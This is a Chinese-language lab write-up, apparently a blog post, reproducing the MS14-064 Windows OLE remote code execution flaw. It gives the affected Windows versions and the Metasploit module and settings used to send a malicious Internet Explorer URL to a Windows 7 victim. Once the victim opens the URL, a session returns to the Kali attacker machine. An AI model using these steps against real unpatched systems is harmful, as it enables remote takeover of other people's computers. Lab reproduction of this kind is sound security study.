MS14-064漏洞复现

MS14-064漏洞复现

摘要

此安全更新可解决 Microsoft Windows 对象链接与嵌入 (OLE) 中 2 个私下报告的漏洞。最严重的漏洞可能在用户使用 Internet Explorer 查看经特殊设计的网页时允许远程执行代码。成功利用这些漏洞的攻击者可以在当前用户的上下文中运行任意代码。如果当前用户使用管理用户权限登录,则攻击者可随后安装程序;查看、更改或删除数据;或者创建拥有完全用户权限的新帐户。那些帐户被配置为拥有较少用户权限的用户比具有管理用户权限的用户受到的影响要小。

漏洞影响版本

Windows Server 2003
Windows Vista
Windows Server 2008
Windows 7
Windows Server 2008 R2
Windows 8 和 Windows 8.1
Windows Server 2012 和 Windows Server 2012 R2
Windows RT 和 Windows RT 8.1
服务器核心安装选项

实验环境

攻击机:kali(192.168.109.128)
受害机:win7(192.168.109.129)

漏洞复现

首先保证两台机器之间的连通性

进入msfconsole

选择MS14-064漏洞利用的payload和进行参数配置

use exploit/windows/browser/ms14_064_ole_code_execution
set AllowPowershellPrompt true
set lhost 192.168.109.128
exploit



可以看到在生成的payload里面发现恶意url

打开win7的ie浏览器,访问这个恶意url

可以看到在kali的msfconsole里面成功收到会话

成功拿到win7权限,漏洞复现成功

漏洞修复

去微软官网下载补丁或将操作系统进行升级

  • 3
    点赞
  • 24
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

super 硕

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值